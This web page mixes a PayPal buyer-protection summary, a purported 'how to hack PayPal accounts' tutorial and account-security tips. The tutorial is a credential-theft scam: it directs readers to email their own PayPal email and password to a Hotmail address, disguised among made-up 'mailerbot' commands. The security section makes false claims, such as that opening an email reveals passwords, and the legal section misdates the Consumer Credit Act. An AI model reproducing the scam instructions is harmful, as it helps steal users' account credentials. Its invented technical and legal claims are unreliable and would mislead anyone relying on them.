What is PayPal ?
Safety and protection policies
The PayPal Buyer Protection Policy states that the customer may file a buyer complaint
if he or she did not receive an item or if the item he or she purchased was significantly
not as described. The customer can open a dispute within 180 days
(for registered UK residents 180 days, changed 14 June 2014) from the date of payment
and escalate it to a claim within 20 days from opening the dispute.
If the buyer used a credit card, he or she might get a refund via chargeback from his
or her credit-card company. However, in the UK, where such a purchaser is entitled to
specific statutory protections (that the credit card company is a second party to the
purchase and is therefore equally liable in law if the other party defaults or goes into
liquidation) under Section 75 Consumer Credit Act 1979, the purchaser loses this legal protection
if the card payment is processed via PayPal.
HOW TO HACK INTO PAYPAL ACCOUNT!!!
(Hotmail
accounts for paypal accounts This is from october 22, 2007)1) The
following complete hacking tutorial contains materials that may not be
suitable for irresponsible internet users, reader discretion is advised!
we have to put that so we don't get i trouble.
2)
The hacking method is based on a secretly discovered security flaw in
the PayPal (www.paypal.com) mailing address confirmation system. It will
only work BEFORE PayPal discovers this serious security flaw and fixes
it. Take your action FAST!
3) This method works for any body with
PayPal accounts with CONFIRMED MAILING ADDRESSES. It will never work
for PayPal user without a confirmed mailing address.
4) By
strictly following instructions in the following tutorial, you'll gain
unlimited access to various PayPal accounts with confirmed mailing
addresses. Use those accounts AT YOUR OWN RISK. You?re responsible for
your action!
5) When you use PayPal, NEVER log on to sites that
do not start EXACTLY with www.paypal.com even if it contains the term
?paypal? in it.PayPal is the latest victim of internet hackers. Despite
the company?s seemingly perfect security system, a serious security flaw
in the ADDRESS CONFIRMATION PROCESS of PayPal?s members? accounts has
been discovered by a few experienced hackers from Russia. The hacking
process has been simplified a while ago and it was revealed on a Russian
language hacking website.
PayPal was immediately alerted of this
security flaw after the Russian language hacking tutorial was published
on the website, but in order to prevent its customers from losing trust
in internet banking, PayPal chose NOT to alert its customers of this
security flaw and has then secretly BANNED numerous online articles that
contained information of this security flaw.
However, it has been
confirmed that due to technical difficulty, PayPal has NOT yet fixed the
problem and at this moment right now, anyone can STILL hack into a
great number of PayPal accounts with confirmed addresses.
To inform
users worldwide of this problem, I?ve attached an English version of the
hacking process. Remember, to get the whole thing to work, you MUST
STRICTLY follow the instructions and have a PayPal account with a confirmed mailing address!HACKING PROCESS:
Every
PayPal member is identified by his/her Email and the majority of the
PayPal members use Hotmail. After completion of the mailing address
confirmation process, usually by adding a CREDIT CARD, PayPal
automatically sends the user?s address confirmation info to a mailerbot
associated with the user?s Email, in most cases, it?s Hotmail mailerbot.
The
security flaw occurs RIGHT HERE! Both Yahoo and Hotmail mailerbots can
be confused by a random user and sends out information saved on its
server to that user.
To get PayPal account information of numerous
random PayPal users from a Hotmail mailerbot, you have to do the
following:1) Log into your www.paypal.com homepage, and click on
?Profile?, and then click on
?Street Address? under?Account Information?.
2)
Find the Address whose status is ?Home?, and if it says ?confirmed?,
then please read on.Basically, A Confirmed Address is any address at
which you receive your credit card statement. If you receive a credit
card bill at this address, you can confirm it by entering your credit
card information. This information will only be used to confirm your
address. Your card will not be charged by PayPal.So, if your Home
address is NOT confirmed, then FOLLOW THE INSTRUCTIONS ON PAYPAL AND ADD
A CREDIT CARD TO CONFIRM YOUR MAILING ADDRESS.3) Okay, There are two
bots which this will work for.
I. If you want an account with hotmail email, then:
Log in to your paypal email account and send an Email to:
paypalresponsebot035@hotmail.com
(This is the hotmail mailerbot described above) (NEW) (Other mailer
bots are not active now)In the subject line, write:
789bot4*5%8verif-0e24
(To confuse the hotmail mailerbot)In the email body, please write
exactly 11 lines, which MUST BE as follows:
In line 1:Subject-Type: ?text/plain="+1"?In line 2: charset=us-english
(To
make the reply readable in your language so put you own language here
otherwise it might come in a laguage you don't understand)In line 3:
botbody*78#9 confirmation0e24.hotmail.com
(To confuse the mailerbot)In line 4: p38ylec00rm::s%%(a href=http://www.paypal.com%%)
(To make the mailerbot start retrieving information acquired from PayPal.)In line 5: Your primary email at paypal
(To
retrieve information from PayPal, The mailerbot now needs an Email
which is the primary Email of a PayPal account with a confirmed mailing
address, you have to use your own Email as a bait Email and you?ll need
to receive info of other accounts from this Email too, so be sure this
is your primary Email at PayPal.)In line 6: start (retrieve > 07)
(To activate the mailerbot's retrieval function at the highest speed)In line 7: verify#8% (*value= = float)
(This will trick him to send it to your email adress instead of the administrators)In line 8: Your PayPal password
(Now
you have to enter your paypal password to confuse the bot so it thinks
your the administrator of paypal and it can send you the emails and
passwords of people.)In line 9: #searchppagend72hrlog
(to get info from PayPal members who had their addresses confirmed in the last 72 hours)In line 10 send#%*idR20334-tsa-0583
(This will make the mailerbot send all the info to your email)In line 11 (#%7*tmbot*="+098")
(this
covers you trail so they cant find you. Last step!)If you specifically
follow the instructions above, you'll have email, passwords and all
sorts of information of PayPal users who had their mailing addresses
confirmed over the last 72 hours.
Protect your paypal account from Hackers.
Learn
how to keep out hackers your PayPal account. With the ever growing
popularity of PayPal, there are always people that want your money.
Protect Your PayPal Account by NEVER Opening Paypal Emails
One
popular way that hackers are accessing PayPal is through email. Most
people already know NOT to click a link in an email for their PayPal
mail. Fake emails are supposed to be sent to spoof@ PayPal.com.
Do
NOT ever open emails from PayPal. Do not open mails to see that a
transaction occurred. Do not open mails that show you paid or anything.
Everything that you need for financial record keeping for PayPal can be
accessed directly from the PayPal site. You can print transaction logs
directly from the PayPal site. You can print individual receipts from
purchases and subscription payments directly from the site.
There
is a hacker program that once you open an email, the program
automatically retrieves your email password. Without your knowledge, the
hacker sends a request to PayPal for lost password. PayPal then sends
the new password information to the email. The hacker has your email
password and can then automatically retrieve your PayPal password
without your knowledge.
Keep the PayPal customer service number
available. If an email has been received that the PayPal account has
been compromised, it is best to talk to the customer service
representatives instead of communicating via emails and on the PayPal
site. Some emails state that the account has been compromised so that
you will open that email. Once the email is opened it might be too late.
These spoof emails are designed to create a panic and get you to click
links inside the email. But the info that the hacker needs is given to
them as soon as you open the email. Clicking the link just makes their
job easier.
Protect Your PayPal Account by Calling Customer Service
If
you open an email, call the PayPal customer service immediately. Tell
them that your account was compromised. Ask for assistance on
temporarily freezing the account until you can secure it again. Get the
PayPal staff to help you secure your account.